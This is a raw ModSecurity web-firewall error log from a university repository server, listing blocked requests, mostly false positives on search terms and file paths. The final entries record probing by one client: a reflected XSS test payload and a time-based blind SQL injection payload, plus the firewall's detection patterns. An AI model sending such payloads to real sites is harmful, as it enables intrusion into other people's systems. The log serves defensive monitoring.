[Mon Aug 28 20:17:54.673365 2023] [:error] [pid 51586] [client 47.128.28.239] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22YOUR BRAIN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyegsCo-f0AAMmC5eMAAAAH"]
[Mon Aug 28 20:27:37.151149 2023] [:error] [pid 51732] [client 47.128.21.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_Data_structure_and_software_engineering.PNG.PNG"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOygycCo-f0AAMoUdzUAAAAO"]
[Mon Aug 28 20:32:12.956317 2023] [:error] [pid 51662] [client 47.128.26.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22LIVING, LIGHT\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyh3MCo-f0AAMnORNUAAAAU"]
[Mon Aug 28 20:48:55.778358 2023] [:error] [pid 52230] [client 47.128.23.220] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Kualitas Produk, Harga, Kepuasan Konsumen.  1\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOylx8Co-f0AAMwGqrgAAAAe"]
[Mon Aug 28 20:53:17.605198 2023] [:error] [pid 52230] [client 47.128.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22DEVELOP, BRILLIANT, MEMORY\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOymzcCo-f0AAMwGqr0AAAAe"]
[Mon Aug 28 21:05:52.391990 2023] [:error] [pid 52440] [client 47.128.16.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Research - Methology\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOypwMCo-f0AAMzYAXsAAAAY"]
[Mon Aug 28 23:15:19.714424 2023] [:error] [pid 54445] [client 40.77.167.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Kinerja Karyawan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzIF8Co-f0AANStw94AAAAC"]
[Tue Aug 29 00:26:58.519469 2023] [:error] [pid 56502] [client 36.69.215.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//Nuri Depan-digabungkan_compressed.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOzY4sCo-f0AANy2oGMAAAAb"]
[Tue Aug 29 00:27:21.628751 2023] [:error] [pid 56446] [client 47.128.22.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Perjanjian, upah, Pekerja Rumah Tangga\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzY@cCo-f0AANx@dI8AAAAE"]
[Tue Aug 29 02:16:27.957664 2023] [:error] [pid 57729] [client 52.167.144.181] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Earning Per Share (EPS), Return On Assets (ROA)\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzyi8Co-f0AAOGBMvsAAAAc"]
[Tue Aug 29 03:34:07.271974 2023] [:error] [pid 58535] [client 52.167.144.173] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Sulfur Hexa Fluorida, Circuit Breaker, Arduino ATM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0Ev8Co-f0AAOSnNVAAAAAO"]
[Tue Aug 29 03:44:29.736547 2023] [:error] [pid 58591] [client 52.167.144.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Diagram pareto, Preventive action\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0HLcCo-f0AAOTfHdoAAAAB"]
[Tue Aug 29 04:00:49.767422 2023] [:error] [pid 58853] [client 40.77.167.242] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Sustainable Logistics and Supply Chain Management \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0LAcCo-f0AAOXlgDkAAAAQ"]
[Tue Aug 29 04:05:10.863642 2023] [:error] [pid 58938] [client 52.167.144.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Penerapan standar akuntansi pemerintah, kualitas a\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0MBsCo-f0AAOY6kdQAAAAL"]
[Tue Aug 29 04:18:21.963847 2023] [:error] [pid 59094] [client 40.77.167.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Profesionalisme , kompetensi Auditor\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0PHcCo-f0AAObW-d4AAAAP"]
[Tue Aug 29 05:33:18.035945 2023] [:error] [pid 59891] [client 52.167.144.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ani Syaadah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0grsCo-f0AAOnzZIIAAAAB"]
[Tue Aug 29 05:48:59.544930 2023] [:error] [pid 59890] [client 40.77.167.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Brooks, Frederick P\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0kW8Co-f0AAOny-1gAAAAA"]
[Tue Aug 29 06:00:41.855970 2023] [:error] [pid 60285] [client 52.167.144.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22HUKUM PENANAMAN MODAL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0nGcCo-f0AAOt9vDwAAAAF"]
[Tue Aug 29 07:11:56.483689 2023] [:error] [pid 61406] [client 47.128.31.243] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22DERA NADISA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO03zMCo-f0AAO-esXgAAAAN"]
[Tue Aug 29 09:04:38.962207 2023] [:error] [pid 62766] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPEMBUATAN SIMULASI GERBANG TOL DENGAN RFID\\x0d\\x0aBERBASIS MIKROKONTROLER ATMEGA 328P \\x0d\\x0a "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZO1SNsCo-f0AAPUusBoAAAAG"]
[Tue Aug 29 09:04:40.009266 2023] [:error] [pid 62766] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPEMBUATAN SIMULASI GERBANG TOL DENGAN RFID\\x0d\\x0aBERBASIS MIKROKONTROLER ATMEGA 328P \\x0d\\x0a "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZO1SOMCo-f0AAPUusBsAAAAG"]
[Tue Aug 29 09:04:40.253880 2023] [:error] [pid 62766] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPEMBUATAN SIMULASI GERBANG TOL DENGAN RFID\\x0d\\x0aBERBASIS MIKROKONTROLER ATMEGA 328P \\x0d\\x0a "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZO1SOMCo-f0AAPUusBwAAAAG"]
[Tue Aug 29 09:04:46.153283 2023] [:error] [pid 62658] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPEMBUATAN SIMULASI GERBANG TOL DENGAN RFID\\x0d\\x0aBERBASIS MIKROKONTROLER ATMEGA 328P \\x0d\\x0a "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZO1SPsCo-f0AAPTC2hsAAAAK"]
[Tue Aug 29 09:04:48.385732 2023] [:error] [pid 62658] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPEMBUATAN SIMULASI GERBANG TOL DENGAN RFID\\x0d\\x0aBERBASIS MIKROKONTROLER ATMEGA 328P \\x0d\\x0a "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZO1SQMCo-f0AAPTC2hwAAAAK"]
[Tue Aug 29 09:04:51.816370 2023] [:error] [pid 62658] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title:  \\x0d\\x0a\\x0d\\x0aPEMBUATAN SIMULASI GERBANG TOL DENGAN RFID\\x0d\\x0aBERBASIS MIKROKONTROLER ATMEGA 328P \\x0d\\x0a "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZO1SQ8Co-f0AAPTC2h0AAAAK"]
[Tue Aug 29 09:29:03.092019 2023] [:error] [pid 63550] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB I_RAIHAN.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1X78Co-f0AAPg@cxAAAAAN"]
[Tue Aug 29 11:03:45.579129 2023] [:error] [pid 65420] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//DAFTAR PUSTAKA_RAIHAN.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1uIcCo-f0AAP@MV0UAAAAH"]
[Tue Aug 29 11:19:30.451240 2023] [:error] [pid 720] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO1x0sCo-f0AAALQEz8AAAAN"]
[Tue Aug 29 11:19:30.642780 2023] [:error] [pid 722] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO1x0sCo-f0AAALSCAQAAAAR"]
[Tue Aug 29 11:30:11.043303 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10U8Co-f0AAAO-1nUAAAAI"]
